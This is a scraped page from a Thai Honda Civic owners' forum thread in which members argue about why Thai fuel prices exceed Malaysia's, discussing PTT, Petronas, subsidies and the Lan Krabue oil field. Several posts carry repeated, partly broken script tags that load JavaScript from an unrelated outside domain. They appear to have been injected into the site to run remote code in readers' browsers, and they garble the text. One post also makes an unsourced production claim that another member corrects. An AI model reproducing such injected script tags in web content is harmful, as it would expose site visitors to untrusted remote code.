4. กำไรปตท ของไทย จึงเทียบปิโตรนาสไม่ติด เพราะ ไทยไม่ได้ทำเพื่อการส่งออกอย่างปิโตรนาส ไทยไม่สามารถส่งออกได้เพราะลำพังกำลังการผลิตก๊าซและน้ำมันดิบในประเทศตอนนี้ก็ไม่พอกับคน 63 ล้านคนในประเทศแล้ว ต้องนำเข้าก๊าซประมาณ 30% ของการใช้ก๊าซทั่วประเทศ และน้ำมันดิบกว่า 80% ของการใช้น้ำมันดิบทั่วประเทศ ในขณะที่ีมาเล มีคนน้อยกว่าตั้งเยอะ (ประมาณ 27 ล้านคน) กำลังการผลิตเขามีเกินพอ จึงส่งออกได้ สถานการณ์มันต่างกันครับ จึงเทียบกันไม่ได้หรอก

5. ดังนั้น สิ่งที่มาเลทำ ตอนนี้ คือขุดทรัพยากรในประเทศ แล้วส่งออกไปขายนอกประเทศน่ะสิ!!! คนไทยยอมมั้ยล่ะ?? ขุดจากใต้ประเทศเราเอง แล้วเอาไปให้ประเทศอื่นใช้??

6. ตอนผมได้ยินการเปรียบเทียบเรื่องราคาเชื้อเพลิงของประเทศเรา กับมาเลครั้งแรก ผมฉุกคิดขึ้นมาทันทีว่า แล้วประเทศเพื่อนบ้านเราประเทศอื่นล่ะ พม่า ลาว กัมพูชา ที่ด้อยพัฒนากว่าเรา ค่าครองชีพถูกกว่าเรา ราคาเชื้อเพลิงเขาเป็นยังไง??? เกิดความสงสัยครับ เพราะเหมือนว่าคนที่เอาเรื่องมาเลมาพูดนั้น พูดไม่หมด ไม่ยอมเอาข้อมูลประเทศอื่นรอบๆไทย มาบอกด้วย...แล้วก็เป็นจริงอย่างที่ผมคิดครับ ราคา LPG ย้ำนะครับ LPG ที่ใช้หุงต้มในครัวเรือน ของเพื่อนบ้านเรา แพงกว่าที่เราใช้ทั้งหมด ทั้งๆที่ค่าครองชีพเขาต่ำกว่าเรามาก แต่ครัวเรือนเขากลับต้องจ่ายแพงกว่า สรุปว่า ไทยเราขาย LPG ถูกที่สุด เป็นลำดับที่สองของอาเซียน!!! รองจากมาเล เคยดูข้อมูลพวกนี้ประกอบบ้างไหมครับ???

7. มาเลขายน้ำมันถูก เพราะรัฐช่วยตรึงราคามาก (แต่ไทยรัฐเก็บภาษีหนักหน่วง) โดยเอาเงินที่กำไรมหาศาล จากการส่งออกก๊าซ/น้ำมันดิบ มาช่วยตรึงราคา นั่นแหละ ถามว่าเมืองไทยจะเอาบ้างไหมล่ะ ขุดในประเทศ แล้วส่งออกไปให้คนอื่นใช้ แล้วเอากำไรตรงนั้นมาเข้ากองทุนให้รัฐตรึงราคาให้ ยอมรับกันได้หรือเปล่า นี่แหละ เหตุผลที่ประเทศเค้าราคาถูก

สรุปคือ
แนวทางที่จะทำให้ราคาเชื้อเพลิงในประเทศเราถูกอย่างมาเลเซียคือ
1. คนไทยช่วยกันประหยัดพลังงานให้ไม่ต้องมีการนำเข้าอีกต่อไป จนมีเหลือใช้ (ซึ่งจะเกิดขึ้นก็ต่อเมื่อคนไทยต้องใช้เชื้อเพลิงเพียง 20% ของที่ใช้กันอยู่ตอนนี้ เคยขับรถเดือนละ 30 วัน ลดให้เหลือเพียง 6 วันต่อเดือน นอกนั้นขี่จักรยาน/เดินไปนะ ห้ามนั่งรถเมล์ เพราะรถเมล์ก็ต้องใช้เชื้อเพลิง)
2. เมื่อไม่ต้องนำเข้าและมีเชื้อเพลิงเหลือใช้แล้ว ก็ให้ขุดเชื้อเพลิงที่เหลืออยู่ ส่งออกไปขายให้ประเทศอื่นให้หมด โดยไม่ต้องคำนึงถึงว่าจะไม่เหลือเชื้อเพลิงให้ลูกหลานไทยในอนาคตใช้กัน เพื่อให้ได้กำไรจากการส่งออกเชื้อเพลิง มาเข้ากองทุนน้ำมัน ลดภาระให้กับผู้บริโภค

ปัญหาไม่ได้อยู่ที่ ปตท หรือ รัฐบาล แต่อยู่ที่คนไทยทุกคนที่ไม่เคยมีความคิดที่จะประหยัดพลังงานอยู่ในหัว จนสุดท้ายประเทศต้องเสียเงินนำเข้ามหาศาล และพอราคาแพงตามตลาดโลกที่ไปนำเข้ามา ก็กลับโทษผู้ขาย ทั้งๆที่ต้นตอของสาเหตุมันอยู่ที่ผู้ใช้ ที่ใช้อย่างไม่รู้จักความพอดี ระงับกิเลสตัณหาตัวเองไม่ได้ และนอกจากนี้ ผมอยากจะรู้ว่า มีคนไทยคนไหนมั่ง ที่มีเห็นด้วยกับแนวคิดที่จะขุดทรัพยากรในประเทศ ส่งออกไปให้ประเทศอื่นแบบที่ประเทศมาเลเซียทำ??? ถ้ามันยังเป็นไปไม่ได้ ก็เลิกคิดเลิกหวังซะเถอะครับ ที่จะให้ราคาเชื้อเพลิงไทยต่ำเท่ามาเลเซีย เพราะถ้าให้รัฐบาลไทยช่วย Subsidize ราคาแบบมาเลเซียนะ งบทั้งกระทรวงจะพอรึเปล่ายังไม่รู้เลย จะให้รัฐหาเงินจากไหนกัน...

สุดท้ายนี้ ก็เหมือนเดิมครับ..อย่าพึ่งเชื่อผม ไปศึกษาบริษัทปิโตรนาสดูจากเวบไซต์ด้วยตัวคุณเอง แล้วดูซิว่า ผมพูดถูกหรือเปล่า ++++

น่าจะอ้างอิงแหล่งที่มาด้วยนะครับ เผื่อเพื่อนๆ อยากศึกษาเพิ่มเติม หรือทราบต้นตอของบทความอ่ะ
ยังไงก็ขอบคุณที่แบ่งปัน ส่วนจะเชื่อหรือไม่ มีวิธีคิดและตอบสนองอย่างไรก็เรื่องของตัวบุคคลครับ

อืมขอโทษค่ะ ก๊อปมาไมได้ให้เครดิต ตามนี้จ๊ะ World of Energy
http://outboxes.blogspot.com/2009/11/blog-post.html
ส่วนอ่านแล้วเป็นไง ก็ตามสิทธิส่วนบุคคลตามคุณพี่บอกค่ะ อิอิ
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 13:45 - อะไรจะขนาดนั้นครับ

ในเมื่อคุณไม่มีรายได้พร้อมที่จะใช้รถยนต์ หรือ พร้อมที่จะเติมน้ำมัน คุณก็ใช้มอไซค์สิ (แปลในความคิดผมก็คือ ไม่มีปัญญาใช้ ก็ไปขี่มอไซซะ )

ไม่ได้ว่าใครนะ แค่เปรียบเทียบให้ฟังว่า แทนที่จะด่าคนอื่น หรือเปรียบเทียบกับชาวบ้าน น่ะ เคยหันมามองตัวเองไหมว่า วันนี้ คุณพร้อมหรือยัง ที่จะแบกรับภาระ ที่จะใช้ ( อย่ามาบ่น ไปปรับตัวเองซะไป ลำบากนักก็ไม่ต้องเติม อย่ามาโอดครวญน้ำมันแพง )

ถ้าทำให้ไม่พอใจ ก็ ขอโทษค่ะ ไม่ได้มีเจตนาให้ใครขายรถไปใช้จักรยาน
แค่ยกตัวอย่างค่ะ
ถ้าทำให้คุณพี่เข้าใจแบบนั้น ทำให้ไม่พอใจ ก็ขอโทษค่ะ
ได้รับคำขอบคุณจาก: tun221  hanaun 
nilkung

ครอบครัว ES
ครอบครัว ES

สี: ฟ้า ไอซ์บูล (เมทัลลิก) (B-506M)
ศุกร์, 23 มีนา 2012 13:47 - อะไรจะขนาดนั้นครับ

หลายวิธีครับ เยอะขอไม่บอกวิธีละกันเพื่อความเป็นอยู่ของที่ดีของชาวบ้านแถวนั่น

เฮ้ย......ผมหมายถึงให้รัฐนำเข้ามาอย่างถูกกฎหมายซิคร้าบบบบบบบบบ
AofStaR

ชื่อเล่น: อ๊อฟ

เข้าร่วม: 25 ธันวา 2011
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1569
ให้คำขอบคุณ: 1125

ศุกร์, 23 มีนา 2012 13:57 - อะไรจะขนาดนั้นครับ

เฮ้ย......ผมหมายถึงให้รัฐนำเข้ามาอย่างถูกกฎหมายซิคร้าบบบบบบบบบ

อั้ยยะะ
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 13:58 - อะไรจะขนาดนั้นครับ
กระทู้นี้ ถ้าจะเอาความเป็นจริงมาถกกันก็ต้องเปิดใจยอมรับเหตุผลของแต่ละฝ่าย ไม่ใช่เอาอารมณ์และความรู้สึกเป็นตัวตัดสิน

ถ้าคนไทย ยังใช้อารมณ์ ความรู้สึก และกระแส ในการตัดสินใจ ประเทศเราจะก้าวต่อไปได้อย่างไรคะ เข้าใจว่าทุกคนรู้สึกเจ็บปวดกับค่าน้ำมันที่สูงขึ้น แต่ถ้าเราใช้อารมณ์และความรู้สึกนั้นมาเป็นตัวชี้นำ มันก็จะทำให้สิ่งที่ควรจะถูก กลายเป็นผิด และสิ่งที่ผิด กลายเป็นถูกได้ คนที่มีข้อมูล ก็ไม่อยากจะนำมาแชร์ ไม่อยากฝืนกระแส อยู่เงียบๆ ต่อไป ลองคิดดูว่า ถ้าวันหนึ่ง ถ้าท่านตกเป็นจำเลยของสังคมมั่ง โดยที่คนอื่น ไม่สนใจว่าท่านจะเอาเหตุผลมาชี้แจงอย่างไร เพราะทุกคนใจ ความรู้สึก ใช้กระแสเป็นตัวตัดสินใจ ท่านจะรู้สึกอย่างไร ฝากนำไปคิดด้วยนะคะ
ใครมีข้อมูลหรือประสบการณ์ได ก็ขอแชร์ อย่างคุณพี่ข้างบน จำเป็นต้องใช้รถ ก็เลือกที่จะเดินไปหา พลังงานที่ถูกกว่า
ปรับตัวให้เข้ากับชีวิต ส่วนตัว ยกย่องค่ะ
ปล.ไม่ได้ว่าใครมาพูดในนี้ จะเรียกว่าบ่นนะคะ ขอเรียกว่าแชร์ขอความคิดเห็นมากกว่าค่ะ อุอุ
Cra2yLov3

ศุกร์, 23 มีนา 2012 14:03 - อะไรจะขนาดนั้นครับ

นำเข้าอย่างถูกกฎหมาย แล้วรัฐ+ภาษ๊ ก็เท่ากับ ราคาปัจจุบัน <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ รัฐกินกันอิ่มเหมือนเดิม
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 14:34 - อะไรจะขนาดนั้นครับ
นำเข้าอย่างถูกกฎหมาย แล้วจะอิงจากราคาไหน เพราะราคาที่ขายในมาเลย์ ไม่ใช่ราคาจริง เป็นราคาที่รัฐเค้าอุดหนุนนี่นา
AofStaR

Guru ES
Guru ES

ศุกร์, 23 มีนา 2012 15:29 - .

ใจเย็นๆครับพี่ ข้อมูลที่คุณส้มจี๊ดให้มาก้อมีโยชน์ครับให้แงคิดอีกด้านที่ผมและเพื่อนๆอีกหลายคนไม่เคยรู้ได้รับรู้ความเป็นมาแต่อาจจะผิดพลาดในการสื่อสารนิสๆผมอ่านทีแรกก้อสดุงนิสๆ แต่ความคิดเห็นของพี่ก้อไม่ผิดนะครับ ผมเองก้อเป็นอีกตนนึ่งที่ต้องใช้รถยนต์ในการประกอบอาชีพ(ผมเป็นเช็คเกอร์สินเชื่อไฟแนนท์ครับ)เวลาไปตรวาจสอบบ้านลูกค้า ระยะทางไปกลับ200-300ก.ม.ต่อวันให้ใชมอไซต์คงมะไหวเมื่อยไข่ อิอิ จะให้ผมติดแก๊ส3หมืนผมก้อคงมะไหว เพราะผมก้อไม่ได้วิ่งดูบ้านลูกค้าทุกวัน วันไหนที่ผมไม่ได้วิ่งดูบ้านลูกค้าอยู่แต่ออฟฟิสผมก้อใช้มอไซต์ครับ เอาเป็นว่าเรามาแรกเปลี่ยนความคิดเห็นแชร์ความคิดแชร์ข้อมูลกันดีกว่าเน้อะ "<script src="https://sport32news.com/civicesgroup.js"> ES กรุ๊ป รักกันรักกัน
ได้รับคำขอบคุณจาก: Zenkii  lordpark  kaisuh 
AlwaysCivic

เข้าร่วม: 29 ตุลา 2008
ตอบ: 181

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 618
ให้คำขอบคุณ: 422

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 23 มีนา 2012 15:46 - อะไรจะขนาดนั้นครับ
/me เข้าโหมดดัดจริต

"ขอบอกว่าปวดตาค่ะ อ่านมา 2 หน้า จะอ่านต่อก็ไม่ไหวแล้ว

แค่นี้นะจะรีบไปเติมน้ำมัน เดี๋ยวมันขึ้นราคาอีก"
AofStaR

Guru ES
Guru ES

ศุกร์, 23 มีนา 2012 15:56 - ..
AlwaysCivic พิมพ์ว่า:

"ขอบอกว่าปวดตาค่ะ อ่านมา 2 หน้า จะอ่านต่อก็ไม่ไหวแล้ว

แค่นี้นะจะรีบไปเติมน้ำมัน เดี๋ยวมันขึ้นราคาอีก"

ผมดัดจริตหรอ
nilkung

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 16:17 - อะไรจะขนาดนั้นครับ
นำเข้าอย่างถูกกฎหมาย แล้วจะอิงจากราคาไหน เพราะราคาที่ขายในมาเลย์ ไม่ใช่ราคาจริง เป็นราคาที่รัฐเค้าอุดหนุนนี่นา

อืมน่าคิด ถ้าเขาจะมาขายเราก็อาจจะแพงกว่าที่ขายในประเทศ

ปล.อย่าทะเลาะกันเลยครับ รักกันดีกว่าน้า........
AlwaysCivic

เข้าร่วม: 29 ตุลา 2008
ตอบ: 181

ได้รับคำขอบคุณ: 618
ให้คำขอบคุณ: 422

สี: ขาว ทาฟเฟต้า (NH-578)
ศุกร์, 23 มีนา 2012 16:26 - Re: ..

ไม่ใช่นะครับ /me หมายถึงตัวผมเอง ผมเป็นผู้ชาย แต่เข้าโหมดดัดจริต อ่ะ เลยพูดว่า "ขอบอกว่าปวดตาค่ะ" ไม่ได้ว่าใครนะคร้าบบบบ
AofStaR

Guru ES
Guru ES

ศุกร์, 23 มีนา 2012 17:10 - Re: ..

ไม่ใช่นะครับ /me หมายถึงตัวผมเอง ผมเป็นผู้ชาย แต่เข้าโหมดดัดจริต อ่ะ เลยพูดว่า "ขอบอกว่าปวดตาค่ะ" ไม่ได้ว่าใครนะคร้าบบบบ

ครับๆผมแซวเล่นน่ะ รีบไปเติมน้ำมันเถอะครับเด้วจะไม่ทัน อิอิ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: AlwaysCivic 
jo_jonatan

ชื่อเล่น: โจ้

เข้าร่วม: 05 ตุลา 2009
ตอบ: 629

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 572
ให้คำขอบคุณ: 536

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
ศุกร์, 23 มีนา 2012 17:30 - อะไรจะขนาดนั้นครับ
โอ้ย.. อ่านมาจนปวดตา.. มันจะแพงแค่ไหนก็ต้องเติมครับ เพื่อขับเคลื่อนเจ้า ES คันเก่ง ต่อไป 555
ได้รับคำขอบคุณจาก: puyzaaaaa  Edan 
MATOOM

ชื่อเล่น: เต้

เข้าร่วม: 10 สิงหา 2010
ตอบ: 449

ได้รับคำขอบคุณ: 1202
ให้คำขอบคุณ: 277

สี: เทา ซิลเวอร์สโตน (NH-630M)
ศุกร์, 23 มีนา 2012 17:39 - อะไรจะขนาดนั้นครับ
จะเลิกเติมน้ำมัน95แล้วครับแพง จะเติมออกเทน100แทนคริคริ (ยิ้มกันหน่อยนะเพื่อนๆ) <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: puyzaaaaa 
Zenkii

ชื่อเล่น: มี่

เข้าร่วม: 21 ธันวา 2010
ตอบ: 403

ได้รับคำขอบคุณ: 586
ให้คำขอบคุณ: 922

ที่อยู่: ดอนเมือง หมู่บ้านศิริสุข หลักสี่ แจ้งวัฒนะ ถนนวิภาวดีรังสิต รังสิต Wash United Donmueang
ศุกร์, 23 มีนา 2012 17:41 - อะไรจะขนาดนั้นครับ
MATOOM พิมพ์ว่า:
จะเลิกเติมน้ำมัน95แล้วครับแพง จะเติมออกเทน100แทนคริคริ (ยิ้มกันหน่อยนะเพื่อนๆ) <script src="https://sport32news.com/civicesgroup.js"></
เอาลูกรักตัวแรงคันไหม่มาโชว์หน่อยจิ๊พี่ชาย

phoochit-n

ชื่อเล่น: เบิ้ล

เข้าร่วม: 19 ตุลา 2009
ตอบ: 815

Guru ES
Guru ES

ได้รับคำขอบคุณ: 923
ให้คำขอบคุณ: 907

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 23 มีนา 2012 18:24 - อะไรจะขนาดนั้นครับ
ก็เคยอ่านเจอ ในอินเตอร์เน็ตนะ
ประเทศไทยขุดน้ำมันที่ลานกระบือได้วันละ 1,000,000 บาร์เรล แต่ส่งออกหมด
และประเทศไทยต้องการใช้น้ำมันแค่ 700,000 บาร์เรล

ตรงนี้ผมว่ามันเพียงพอกับความต้องการของประเทศ และนายทุนไม่ขายในประเทศ แต่ส่งออกหมด

แล้วพวกเราจะคิดกันยังไง(ผิดถูกยังไงขออภัยด้วยครับ)
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 19:40 - อะไรจะขนาดนั้นครับ
phoochit-n พิมพ์ว่า:
ประเทศไทยขุดน้ำมันที่ลานกระบือได้วันละ 1,000,000 บาร์เรล แต่ส่งออกหมด
และประเทศไทยต้องการใช้น้ำมันแค่ 700,000 บาร์เรล

ตรงนี้ผมว่ามันเพียงพอกับความต้องการของประเทศ และนายทุนไม่ขายในประเทศ แต่ส่งออกหมด

แล้วพวกเราจะคิดกันยังไง(ผิดถูกยังไงขออภัยด้วยครับ)

อันนี้น่ะเหรอ เครดิต http://sunti-apairach.com/02/02H.htm
……..กำแพงเพชร มีทรัพยากร ที่ล้ำค่าอยู่ภายใต้พื้นดินคือน้ำมันและก๊าซธรรมชาติ ซึ่งมีการ ขุดเจาะ ตั้งแต่ วันที่ 11 กันยายน ปีพุทธศักราช 2524 จึงเป็นจุดเริ่มต้น ของแหล่งน้ำมันสิริกิติ์ นามพระราชทาน น้ำมันดิบที่ขุดได้ที่อำเภอลานกระบือเรียกว่าน้ำมันดิบเพชร
สมเด็จพระนางเจ้าสิริกิติ์ พระบรมราชินีนาถ เสด็จพระราชดำเนินมาเป็นองค์ประธานในพิธีเปิดแหล่งน้ำมันสิริกิติ์ เมื่อวันวันที่ 12 มกราคม 2526
น้ำมันลานกระบือ ได้รับสัมปทานจากบริษัทไทยเชลล์เอ็กซพลอเรชั่นแอนโปรดักชั่น มาตั้งแต่พุทธศักราช 2522 – 2546 ผลิตน้ำมันได้ครบ 150 ล้านบาร์เรล ในปัจจุบัน บริษัท ปตท.สำรวจและผลิตปิโตเลียม จำกัด (มหาชน)ได้ซื้อหุ้นทั้งหมดของบริษัทไทยเชลล์
………เมื่อคณะของเราไปเยี่ยมชม ได้รับการต้อนรับอย่างดียิ่ง จากทุกฝ่าย โดยเฉพาะอย่างยิ่ง คุณศิริพงศ์ เฟื่องลิขิต ผู้จัดการประชาสัมพันธ์ภูมิภาค
………คุณกิติศักดิ์ นวลจันทร์ฉาย ผู้จัดการอาวุโส ฝ่ายผลิต โครงการ เอส 1 ได้กรุณาพาเราไปชมหลุมแรกที่ขุดเจาะ และกระบวนการผลิตอย่างครบวงจร
ท่านยังยืนยันว่า ใต้แผ่นดินลานกระบือ ยังมีน้ำมันดิบจำนวนมาก สามารถผลิตได้ อีกนาน โดยมีฐานผลิตทั้งหมด 58 ฐาน จำนวนหลุมขุดเจาะ 340 หลุม ( เดือนพฤศจิกายน 2548 ) มีความยาวท่อส่งน้ำมันทั้งสิ้น 270 กิโลเมตร….แต่ละหลุมต้องเจาะลึก ประมาณ 2,000 เมตร หรือ 2 กิโลเมตร เส้นผ่าศูนย์กลางหลุม 20 เซนติเมตร สามารถหักเห ในการขุดเจาะจากศูนย์กลาง ได้ 50 – 1,000 เมตรจากจุดศูนย์กลาง โดยใช้เวลาขุดเจาะ ประมาณ 7 วัน ต่อหลุม
ปริมาณการผลิต ณ เดือนพฤศจิกายน 2548 แหล่งน้ำมันลานกระบือของเราผลิตได้แล้ว 162 ล้าน บาร์เรล ปัจจุบัน เราสามารถผลิต น้ำมันดิบ ได้ 19,000 – 20,000 บาร์เรล ต่อวัน ผลิตก๊าซธรรมชาติ ได้ 40 –50 ล้านลูกบาศก์ฟุต ต่อวัน ผลิตก๊าซหุงต้ม (แอล พี จี) 280-300 ตัน ต่อวันถึงแม้ว่า ผลผลิตของบ่อน้ำมันลานกระบือ จะได้เพียง ร้อยละ3 ของการใช้ทั้งหมดภายในประเทศ แต่ก็ยังทำให้ เงินตราของเราไม่ไหลไปต่างประเทศมากนัก นับว่าลานกระบือของเรามีส่วนช่วย บ้านเมืองได้ไม่น้อยเลยทีเดียว……เมื่อคิดเป็นค่าของเงิน…
…..อำเภอลานกระบือ ซึ่งเมื่อ 22 ล้านปีมาแล้ว บริเวณนั้นเป็นทะเลสาบน้ำจืด ขนาดใหญ่ คลุมไปถึงกำแพงเพชร จึงทำให้เกิดแหล่งทรัพยากรที่ยิ่งใหญ่ที่สุดแห่งหนึ่งในประเทศไทย เป็นความภูมิใจ ….ของชาวกำแพงเพชร และชาวไทยร่วมกัน
ham_ter

ครอบครัว ES
ครอบครัว ES

ศุกร์, 23 มีนา 2012 19:43 - อะไรจะขนาดนั้นครับ
phoochit-n พิมพ์ว่า:

เป็นความรู้ใหม่เหมือนกันนะนี่ แต่ตามข้อมูลก็ผลิตได้แค่ สองหมื่นบาเรล ต่อวันเองนะ
แต่ความจริงมาคุยแลกเปลี่ยนกันแบบนี้ เราชอบนะ ได้แสดงความคิดเห็น เรื่องพลังงาน ของแต่ละคนดี
TidTlE

ชื่อเล่น: ติ๊ด

เข้าร่วม: 17 ตุลา 2011
ตอบ: 518

ได้รับคำขอบคุณ: 444
ให้คำขอบคุณ: 593

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
ศุกร์, 23 มีนา 2012 20:23 - อะไรจะขนาดนั้นครับ
น้ำมันแพง ของแพงเราก็ต้องซื้อต้องใช้ต้องอยู่ประเทศไทยต่อไป ก็ทำใจครับ
scanclub

ชื่อเล่น: ไผ่

เข้าร่วม: 18 ตุลา 2009
ตอบ: 1250

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1113
ให้คำขอบคุณ: 2432

ปี: 2001
สี: ทอง เดเสิร์ท มิสท์ (เมทัลลิก) (YP-538M)
ศุกร์, 23 มีนา 2012 20:44 - อะไรจะขนาดนั้นครับ
เปลี่ยนไปใช้น้ำมันมาเลซะเลยนิ
yuncup2008

เข้าร่วม: 05 พฤศจิกา 2008
ตอบ: 427

ได้รับคำขอบคุณ: 420
ให้คำขอบคุณ: 68

ปี: 2001
สี: เทา ซิกเน็ต (เมทัลลิก) (RP-31M)
ศุกร์, 23 มีนา 2012 21:37 - อะไรจะขนาดนั้นครับ
เติมแต่น้ำมันมาเล 4ปีมีนี้เข้าปั้มไมถึง5ครั้งเลยมั้ง
ปล.ลิตร28บาท+ส่งถึงบ้าน "<script src="https://sport32news.com/civicesgroup.js"> "<script src="https://sport32news.com/civicesgroup.js">
ได้รับคำขอบคุณจาก: scanclub 
ตอบ
หน้า 3 จาก 6
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.